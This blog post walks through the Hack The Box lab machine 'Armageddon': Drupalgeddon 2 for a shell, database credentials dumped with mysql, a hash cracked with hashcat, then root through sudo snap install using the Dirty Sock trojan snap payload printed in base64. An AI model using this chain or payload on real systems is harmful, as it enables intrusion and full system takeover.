Armageddon

Posted on Jul 27, 2021

HTB - ARMAGEDDON

nmap

# Nmap 7.91 scan initiated Sat Mar 27 16:28:10 2021 as: nmap -sC -sV -oN nmap_open 10.10.10.233
Nmap scan report for 10.10.10.233
Host is up (0.076s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon

Looking at the changelog


Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
[...]

The version shows that it is vulnerable to Drupalgeddon 2.

So we use the exploit from Metasploit and get a shell as apache2.

In /var/www/html/sites/default/settings.php we find the credentials for the sql user: drupaluser:CQHEy@9M*m23gBVj.

We can’t use login to mysql but we can execute sql commands from cmdline.

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "show databases;"

mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "use drupal;"
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "show tables from drupal;"
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e "select *  from drupal.users;"

uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone        language        picture init    data
0                                               NULL    0       0       0       0       NULL            0               NULL
1       brucetherealadmin       $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu                     filtered_html   1606998756      1607077194      1607076276   1Europe/London           0       admin@armageddon.eu     a:1:{s:7:"overlay";i:1;}

Cracking the hash with hashcat hashcat -m 7900 <hashfile> rockyou.txt

 

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo   
   
Session..........: hashcat   
Status...........: Cracked   
Hash.Name........: Drupal7   
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt   
Time.Started.....: Sat Mar 27 22:56:39 2021 (4 secs)   
Time.Estimated...: Sat Mar 27 22:56:43 2021 (0 secs)   
Guess.Base.......: File (rockyou.txt)   
Guess.Queue......: 1/1 (100.00%)   
Speed.#1.........:    39480 H/s (7.61ms) @ Accel:4 Loops:64 Thr:1024 Vec:1   
Recovered........: 1/1 (100.00%) Digests   
Progress.........: 155648/14344384 (1.09%)   
Rejected.........: 0/155648 (0.00%)   
Restore.Point....: 0/14344384 (0.00%)   
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:32704-32768   
Candidates.#1....: 123456 -> shelbourne   
Hardware.Mon.#1..: Temp: 63c Fan: 30% Util: 99% Core:1950MHz Mem:6800MHz Bus:16   
   
Started: Sat Mar 27 22:56:21 2021   
Stopped: Sat Mar 27 22:56:44 2021

We use the creds to ssh as brucetherealadmin.

Running sudo -l suggests what path to root is.

brucetherealadmin@armageddon ~]$ sudo -l                                                      
Matching Defaults entries for brucetherealadmin on armageddon:                                 
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR        
    USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",                
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin                                                                         

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

We want to install a malicious package.

There is a vulnerability involving snap called [Dirty Sock][https://0xdf.gitlab.io/2019/02/13/playing-with-dirty-sock.html]

What we are interested in is the TROJAN_SNAP

TROJAN_SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''
+ 'A' * 4256 + '==')

We decode that and add it to dirty.snap.

Then we try to install it

herealadmin@armageddon ~]$ sudo /usr/bin/snap install new.snap                                                                                                                         
error: cannot find signatures with metadata for snap "new.snap"                 

Try to install with -dangerous

[brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install new.snap --dangerous                                                                                                             
error: snap "new.snap" requires devmode or confinement override

Finally try by adding --devmode

brucetherealadmin@armageddon ~]$ sudo /usr/bin/snap install --dangerous --devmode new.snap
dirty-sock 0.1 installed

Now we can change to the use dirty_sock and sudo bash -p to get root.txt